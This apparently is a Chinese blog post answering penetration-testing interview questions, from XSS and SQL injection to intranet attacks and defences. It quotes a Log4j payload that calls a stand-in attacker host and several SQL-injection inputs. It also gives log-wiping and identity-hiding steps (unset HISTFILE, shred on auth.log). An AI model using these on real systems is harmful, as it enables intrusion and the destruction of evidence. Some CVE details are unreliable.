2026年渗透测试面试题总结-5(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[121 病毒和蠕虫的区别](#121 病毒和蠕虫的区别)

[122 DNS欺骗(DNS Spoofing)](#122 DNS欺骗(DNS Spoofing))

[123 DDoS攻击类型](#123 DDoS攻击类型)

[124 陆地(LAND)攻击](#124 陆地(LAND)攻击)

[125 XSS漏洞类型与存储型XSS详解](#125 XSS漏洞类型与存储型XSS详解)

XSS分类

存储型XSS危害

修复方案

[126 & 130 渗透测试流程](#126 & 130 渗透测试流程)

[127 移动端APK调试经验](#127 移动端APK调试经验)

[128 云安全(Cloud Security)](#128 云安全(Cloud Security))

[129 虚拟机逃逸(VM Escape)](#129 虚拟机逃逸(VM Escape))

[131 渗透项目实战描述](#131 渗透项目实战描述)

[132 XSS漏洞修复方案](#132 XSS漏洞修复方案)

[133 SQL注入原理](#133 SQL注入原理)

[134 终端(PC)渗透经验](#134 终端(PC)渗透经验)

[135 新型漏洞案例(2023-2025)](#135 新型漏洞案例(2023-2025))

[136 企业内部安全建设](#136 企业内部安全建设)

[137 排序算法](#137 排序算法)

[138 JS密集型页面爬取方案](#138 JS密集型页面爬取方案)

[139 多线程/异步/协程/多路复用性能对比](#139 多线程/异步/协程/多路复用性能对比)

[140 浏览器常用编码](#140 浏览器常用编码)

[141 Web加密算法](#141 Web加密算法)

[142 内网渗透实战](#142 内网渗透实战)

[143 MySQL LIKE查询优化](#143 MySQL LIKE查询优化)

[144 CDN网站获取真实IP](#144 CDN网站获取真实IP)

[145 渗透身份隐藏](#145 渗透身份隐藏)

[146 主机入侵日志排查](#146 主机入侵日志排查)

[147 SQL注入修复](#147 SQL注入修复)

[148 安全研究方向与渗透工作](#148 安全研究方向与渗透工作)

[149 单网址渗透测试](#149 单网址渗透测试)

[150 SQL注入深度利用](#150 SQL注入深度利用)

复制代码
121	病毒和蠕虫的区别
122	DNS欺骗是什么
123	DDOS有哪些
124	陆地land攻击是什么
125	xss有什么?执行存储型的xss的危害和原理
126	渗透测试流程?
127	有没有移动端的调试经验apk
128	对于云安全的理解
129	虚拟机逃逸的理解
130	渗透测试流程
131	描述渗透项目,做了什么
132	xss漏洞类型、详情、修复方案
133	SQL注入原理
134	终端的渗透经验
135	了解什么比较新的漏洞
136	企业内部安全
137	算法?了解过什么排序?
138	爬虫页面存在很多js的时候,用什么
139	多线程异步协程多路复用用哪一个最快为什么
140	浏览器的常用编码
141	web常用的加密算法有什么
142	有没有内网渗透的经验?怎么渗透?如果拿下了边界层的某一个机器,如何对内网其他进行探测?
143	mysql中like查询会会非常缓慢,如何进行优化
144	做了cdn的网站如何获取真实IP
145	渗透的时候如何隐藏自己的身份
146	主机疑似遭到入侵,要看哪里的日志
147	SQL注入漏洞怎么修复
148	安全研究的方面?做过哪些渗透测试的工作?
149	只给你一个网址,如何进行渗透测试
150	SQL注入,id=1如何检测?orderby怎么利用?limit语句怎么利用?盲注有什么?

121 病毒和蠕虫的区别

维度 病毒 (Virus) 蠕虫 (Worm)
传播方式 依附宿主文件(如EXE、文档) 独立传播,利用系统漏洞/网络服务
激活条件 需用户执行宿主程序 自动扫描扩散,无需用户交互
破坏目标 文件破坏、数据加密 消耗带宽、资源耗尽(如Mirai僵尸网络)
典型案例 CIH病毒、Melissa宏病毒 WannaCry、Conficker蠕虫

122 DNS欺骗(DNS Spoofing)

  • 原理:攻击者伪造DNS响应包,将域名解析到恶意IP(如伪造银行网站IP)
  • 技术手段
    • ARP缓存投毒(局域网)
    • 中间人攻击(MITM)
    • 篡改路由器DNS设置
  • 防御
    • DNSSEC(DNS安全扩展)
    • 使用HTTPS强制加密
    • 本地DNS缓存锁定(如dnscrypt-proxy

123 DDoS攻击类型

类型 攻击原理 代表工具
流量型 耗尽带宽(UDP/ICMP洪水) LOIC、HOIC
协议型 消耗服务器资源(SYN洪水、Ping of Death) hping3、Scapy
应用层 高频请求耗尽CPU(HTTP慢速攻击、CC攻击) Slowloris、R.U.D.Y
反射放大 伪造源IP利用协议放大(NTP/DNS反射) Memcrashed、DRDoS

124 陆地(LAND)攻击

  • 原理 :发送源IP=目标IP源端口=目标端口的SYN包,导致系统陷入循环崩溃(早期Windows/Linux受影响)
  • 修复:现代系统已免疫,可配置防火墙丢弃源IP=目标IP的包

125 XSS漏洞类型与存储型XSS详解

XSS分类
类型 触发场景 持久性
反射型XSS URL参数即时返回恶意脚本 非持久
存储型XSS 恶意脚本存入数据库(如评论区) 持久
DOM型XSS 前端JS操作DOM时执行 非持久
存储型XSS危害
  • 盗取Cookiedocument.cookie发送至攻击者服务器
  • 钓鱼攻击:伪造登录框窃取凭证
  • 蠕虫传播:如Samy蠕虫(MySpace)
  • 键盘记录:注入JS监控用户输入
修复方案
复制代码
Javascript

// 输出编码(以PHP为例) htmlspecialchars($input, ENT_QUOTES, 'UTF-8'); // 内容安全策略(CSP) Header("Content-Security-Policy: default-src 'self'");


126 & 130 渗透测试流程

  1. 信息收集
    • WHOIS/子域名扫描(Amass)
    • 端口扫描(Nmap/Masscan)
    • 指纹识别(Wappalyzer)
  2. 威胁建模
    • 绘制攻击面(OWASP Threat Dragon)
    • 确定高危组件(如暴露的Jenkins)
  3. 漏洞分析
    • 自动化扫描(Nessus/Burp Suite)
    • 手动验证(如SQL注入绕过WAF)
  4. 渗透利用
    • 获取初始立足点(如Webshell)
    • 权限提升(Linux脏牛漏洞)
  5. 后渗透
    • 横向移动(Pass-The-Hash)
    • 数据窃取/痕迹清理
  6. 报告输出
    • 风险评级(CVSS评分)
    • 修复建议(附PoC代码)

127 移动端APK调试经验

  • 工具链
    • 反编译:JADX、APKTool
    • 动态调试:Frida(Hook关键函数)、Xposed
    • 流量分析:Burp Suite + 证书绑定绕过(Objection)
  • 常见漏洞
    • 硬编码密钥(strings.xml
    • 组件暴露(AndroidManifest.xmlexported=true
    • 非加密通信(HTTP明文传输)

128 云安全(Cloud Security)

  • 责任共担模型

    用户责任 云商责任
    基础设施 - 物理安全、硬件维护
    平台层 中间件配置、访问控制 虚拟化隔离、补丁
    应用层 代码安全、数据加密 -
  • 关键风险

    • 配置错误(如公开的S3桶)
    • 影子IT(未授权云服务使用)
    • 跨租户攻击(如Azure跨账户漏洞)

129 虚拟机逃逸(VM Escape)

  • 原理:利用Hypervisor漏洞(如CVE-2021-22061)使Guest OS控制Host
  • 案例
    • VMware Workstation 漏洞(vmware-vmx.exe提权)
    • Xen PV内核逃逸(XSA-304)
  • 防御
    • 最小化VM权限
    • 启用Hypervisor保护(如Intel VT-d)

131 渗透项目实战描述

项目背景 :某金融系统Web应用测试
行动步骤

  1. 通过子域名爆破发现测试环境(test.pay.com
  2. 利用未授权访问下载Git源码(.git泄露)
  3. 分析代码发现硬编码数据库密码
  4. 连接数据库提取用户凭证(MD5哈希爆破)
  5. 横向渗透至内网Jenkins服务器(弱口令admin:admin)
  6. 构造恶意Job获取主机Shell
    成果:提交12个高危漏洞报告,协助修复供应链风险

132 XSS漏洞修复方案

漏洞类型 修复方案
反射/存储型 输出编码 + 输入过滤(白名单正则如/^[a-z0-9]+$/) + CSP策略
DOM型 避免innerHTML,使用textContent;校验location.hash内容
通用防御 设置HttpOnly Cookie;启用XSS过滤器(X-XSS-Protection)

133 SQL注入原理

复制代码
Sql

-- 原始语句: SELECT * FROM users WHERE id = '$input'; -- 攻击输入: ' OR 1=1 -- -- 最终语句: SELECT * FROM users WHERE id = '' OR 1=1 -- '; (返回所有用户)

  • 关键点:用户输入未过滤拼接至SQL语句
  • 利用工具:sqlmap(自动检测/拖库)

134 终端(PC)渗透经验

  • 初始立足
    • 鱼叉攻击(恶意PDF漏洞CVE-2021-40444)
    • 供应链攻击(破解软件植入后门)
  • 权限维持
    • Windows:注册表自启动项、计划任务
    • Linux:crontab、.bashrc后门
  • 对抗EDR
    • 进程注入(Process Hollowing)
    • 无文件攻击(PowerShell内存执行)

135 新型漏洞案例(2023-2025)

  1. Log4j2 JNDI注入 (CVE-2021-44228)
    • 利用:${jndi:ldap://attacker.com/exp}
    • 影响:全球70%企业系统
  2. Spring4Shell (CVE-2022-22965)
    • 利用:Tomcat JDK9+环境下参数绑定RCE
  3. Citrix ADC身份绕过 (CVE-2023-3519)
    • 未授权代码执行(政府机构高频目标)

136 企业内部安全建设

  • 零信任架构
    • 微隔离(软件定义边界)
    • 持续身份验证(BeyondCorp)
  • 威胁狩猎
    • 利用ELK+Sigma规则检测异常行为
    • 内存取证(Volatility排查无文件攻击)
  • 员工意识
    • 钓鱼演练(如GoPhish模拟攻击)
    • 最小权限原则(RBAC模型)

137 排序算法

算法 时间复杂度 适用场景
快速排序 O(n log n) 大规模通用数据(原地排序)
归并排序 O(n log n) 链表排序、外部排序
堆排序 O(n log n) 实时系统(最坏情况稳定)
Timsort O(n)~O(n log n) Python/Java内置(混合算法)

138 JS密集型页面爬取方案

  1. 动态渲染引擎
    • Headless Chrome(Puppeteer/Playwright)
    • 执行JS后提取DOM(page.content()
  2. API逆向
    • 抓包分析XHR请求(Chrome DevTools)
    • 模拟Ajax参数(如Token签名)
  3. WebAssembly解析
    • 使用WASM虚拟机执行关键逻辑(Pyodide)

139 多线程/异步/协程/多路复用性能对比

模型 吞吐量 资源消耗 适用场景
多线程 高(线程切换) CPU密集型任务
异步I/O I/O密集型(如爬虫)
协程 极高 最低 高并发网络服务(单机10万+连接)
多路复用 网络服务器(Nginx/Redis)

协程优势:用户态调度无内核切换开销(如Python asyncio、Go goroutine)


140 浏览器常用编码

  1. URL编码%20(空格)、%E4%B8%AD(UTF-8中文)
  2. Base64btoa("hello")"aGVsbG8="
  3. HTML实体< → &lt;© → &copy;
  4. Unicode转义\u4e2d(中)

141 Web加密算法

类型 算法 应用场景
对称加密 AES-256-GCM HTTPS数据传输
非对称加密 RSA-3072/ECC secp384 SSL证书、密钥交换
哈希算法 SHA-3/Bcrypt 密码存储、数据完整性
国密算法 SM4/SM9 中国政府机构系统

142 内网渗透实战

步骤

  1. 信息收集
    • ARP扫描(arp-scan
    • SMB枚举(crackmapexec
  2. 横向移动
    • Pass-The-Ticket(Kerberos)
    • NTLM中继攻击(Responder)
  3. 权限提升
    • 组策略首选项漏洞(GPP密码)
    • DLL劫持(Windows服务路径)
  4. 域控攻陷
    • Zerologon(CVE-2020-1472)重置域管密码
    • DCSync导出所有用户哈希

143 MySQL LIKE查询优化

  • 问题%keyword%无法使用索引(全表扫描)
  • 优化方案
    1. 前缀索引WHERE name LIKE 'key%'(可走索引)
    2. 全文索引 :对长文本启用FULLTEXT索引 + MATCH() AGAINST()
    3. 分词检索:集成Elasticsearch分词查询
    4. 覆盖索引SELECT indexed_col FROM table WHERE col LIKE '%x%'

144 CDN网站获取真实IP

  1. 历史记录查询
    • DNS历史(SecurityTrails)
    • 子域名扫描(可能未接入CDN)
  2. 技术漏洞利用
    • 邮件服务器源IP(注册找回密码功能)
    • SSRF漏洞读取云元数据(AWS:169.254.169.254)
  3. 网络层探测
    • TCP TIMESTAMP差异(工具:CloudPiercer)
    • 特定端口扫描(CDN未覆盖的非常用端口)

145 渗透身份隐藏

  • 网络层
    • VPN跳板 + Tor(多层加密)
    • 使用公共WiFi(非实名认证)
  • 攻击链隐匿
    • 慢速扫描(降低IDS检测率)
    • 加密通信(HTTPS隧道传输C2流量)
  • 痕迹清理
    • 禁用Shell历史(unset HISTFILE
    • 覆盖日志文件(shred -z /var/log/auth.log

146 主机入侵日志排查

日志路径 关键内容
/var/log/auth.log SSH登录记录(成功/失败)
/var/log/syslog 系统进程异常行为
Windows Event Log 安全事件ID 4624/4625(登录)
~/.bash_history 攻击者执行的命令
内存分析 使用Volatility检测恶意进程

147 SQL注入修复

  1. 参数化查询 (核心防御):

    复制代码
    Python

    # Python示例(使用Psycopg2) cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))

  2. ORM框架:SQLAlchemy/Hibernate避免手写SQL

  3. WAF规则 :拦截UNION SELECTSLEEP()等特征

  4. 最小权限 :数据库账户禁用FILE_PRIVDROP权限


148 安全研究方向与渗透工作

  • 研究方向
    • IoT固件逆向(ARM架构漏洞挖掘)
    • AI安全(对抗样本攻击)
  • 渗透工作
    • 红队演练(模拟APT攻击)
    • 漏洞众测(HackerOne/Bugcrowd)
    • 安全工具开发(定制化扫描器)

149 单网址渗透测试

  1. 基础信息
    • 域名Whois + ASN归属
    • 端口扫描(naabu -p 1-65535
  2. Web层攻击
    • 目录爆破(dirsearch -u url
    • 框架漏洞(如Shiro反序列化)
  3. 突破边界
    • 文件上传绕过(Content-Type/00截断)
    • SSRF攻击内网Redis
  4. 权限提升
    • 利用内核漏洞(DirtyPipe)
    • 数据库UDF命令执行

150 SQL注入深度利用

  1. id=1检测
    • 逻辑测试:id=1' and '1'='1(真)/ and '1'='2(假)
    • 错误回显:id=1'(触发语法错误)
  2. ORDER BY利用
    • 判断列数:ORDER BY 5--(直至报错)
    • 数据泄露:ORDER BY (SELECT password FROM users LIMIT 1)
  3. LIMIT注入
    • 联合查询限制:UNION SELECT 1,2,3 LIMIT 1,1--
  4. 盲注技术
    • 布尔盲注:and substring(database(),1,1)='a'
    • 时间盲注:and if(1=1,sleep(5),0)
    • 报错盲注:and extractvalue(1,concat(0x7e,(select user())))
相关推荐
希赛网1 小时前
网工面试:常问技术问题汇总(3)
服务器·前端·网络·网络工程师·ospf·网工面试·技术面
玩大数据的龙威2 小时前
农经权二轮延包—一键出承包地块调查表
数据库·python
越甲八千2 小时前
python socket
开发语言·python
进阶小白猿2 小时前
Java技术八股学习Day23
java·网络·学习
华硕之声2 小时前
试着像猫一样生活
网络·数据·华硕
爱吃肉的鹏2 小时前
树莓派4B安装pytorch
人工智能·pytorch·python
人工智能培训2 小时前
企业如何安全、私密地部署大模型?
人工智能·深度学习·安全·大模型·知识图谱·强化学习·大模型工程师
上海云盾安全满满2 小时前
入侵防御系统与入侵检测系统的核心区别
网络·安全·web安全
_leoatliang2 小时前
基于Python的深度学习以及常用环境测试案例
linux·开发语言·人工智能·python·深度学习·算法·ubuntu